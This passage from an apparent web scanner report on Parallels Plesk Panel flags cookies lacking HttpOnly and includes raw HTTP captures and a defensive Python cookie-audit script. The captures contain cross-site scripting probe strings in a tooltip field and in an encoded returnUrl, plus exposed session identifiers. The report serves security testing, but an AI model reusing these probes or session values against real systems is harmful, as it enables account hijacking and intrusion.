   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" CHECKED > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" CHECKED > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" CHECKED > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" CHECKED > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" CHECKED > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" CHECKED > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10">will it take xss?</TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="3">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.12. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@new/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: psaContext=dashboard; path=/ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; the session cookie PLESKSESSID is only presented by the client in this request, so this response says nothing about its flags. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/custom-buttons/custom-button@new/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:19:08 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:19:08 GMT
Connection: close
Content-Length: 18025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/wizard.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController%2500da28a%3C%2Fscript%3Eda6245b28ac' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@new/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10"></TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="0">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-finish" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply the changes made on this screen and exit the wizard.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);document.forms[0].wizaction.value=&quot;finish&quot;; return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_finish" id="buttonid-finish" type="submit" onClick="Event.stop(event);document.forms[0].wizaction.value=&quot;finish&quot;; return update_oC(document.forms[0]);;return false;">Finish</BUTTON><SPAN id="spanid-finish">Finish</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizstep" value="1"><input type="hidden" name="wizard" value="/plesk/client@2/custom-buttons/custom-button@new/properties/"><input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.13. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/create/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/create/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: psaContext=dashboard; path=/ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; the session cookie PLESKSESSID is only presented by the client in this request, so this response says nothing about its flags. You should review the contents of the cookie to determine its function.
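Findings 5.12 and 5.13 are the same check applied to two paths: a Set-Cookie header without HttpOnly, downgraded to Information because the cookie (psaContext) is not a session identifier. The script below is an added example written for this report, not Plesk or scanner code. It parses the Set-Cookie headers of a raw HTTP response, reports each cookie missing HttpOnly or Secure, and applies a session-token heuristic of our own (session-like name, or a long hex value) to decide the severity. The first sample reproduces the captured Set-Cookie line from these findings; the other two are hypothetical, reusing the PLESKSESSID value seen in the request's Cookie header to show what the check reports for an unprotected session cookie beside its hardened form (the page never shows PLESKSESSID being set, only sent).

```python
"""Audit Set-Cookie headers in a raw HTTP response for missing HttpOnly/Secure.
Added example for this report; not Plesk or scanner code."""
import re

# Constructed from the response headers captured in findings 5.12 and 5.13
# (only the Set-Cookie line matters to the check).
CAPTURED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Set-Cookie: psaContext=dashboard; path=/\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "\r\n"
    "<!DOCTYPE html ...>"
)

# Hypothetical: the session cookie set without flags. The page only shows
# PLESKSESSID being sent by the client, never set by the server.
WEAK_SESSION_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; path=/\r\n"
    "\r\n"
)

# Hypothetical hardened form of the same cookie.
HARDENED_SESSION_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; "
    "path=/; HttpOnly; Secure\r\n"
    "\r\n"
)

SESSION_NAME_HINTS = ("sess", "sid", "token", "auth")
HEX_ID = re.compile(r"[0-9a-fA-F]{16,}")


def parse_set_cookie(header_value):
    """Split 'name=value; attr; attr=val' into name, value and a lower-cased attribute dict."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or True  # flag attrs have no value
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def looks_like_session_token(cookie):
    """Our heuristic: session-ish name, or a long hex identifier as the value."""
    name = cookie["name"].lower()
    if any(hint in name for hint in SESSION_NAME_HINTS):
        return True
    return HEX_ID.fullmatch(cookie["value"]) is not None


def audit_response(raw):
    """Return one finding per Set-Cookie header lacking HttpOnly and/or Secure."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]  # headers only
    findings = []
    for line in head.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        cookie = parse_set_cookie(line.split(":", 1)[1])
        missing = [flag for flag in ("httponly", "secure") if flag not in cookie["attrs"]]
        if not missing:
            continue
        session_like = looks_like_session_token(cookie)
        findings.append({
            "name": cookie["name"],
            "missing": missing,
            "session_like": session_like,
            # Same convention as the report: a non-session cookie is Information only.
            "severity": "Low" if session_like else "Information",
        })
    return findings


if __name__ == "__main__":
    for label, raw in (("captured", CAPTURED_RESPONSE),
                       ("weak session", WEAK_SESSION_RESPONSE),
                       ("hardened session", HARDENED_SESSION_RESPONSE)):
        print(label, audit_response(raw))
```

The Secure check only matters once the panel is reached over TLS; these captures were taken on the plain-HTTP port 8880, where the whole request, PLESKSESSID included, travels in the clear regardless of cookie flags.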

Request

GET /plesk/client@2/domain@1/backup/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/ftp-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:40 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:39 GMT
Connection: close
Content-Length: 17420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

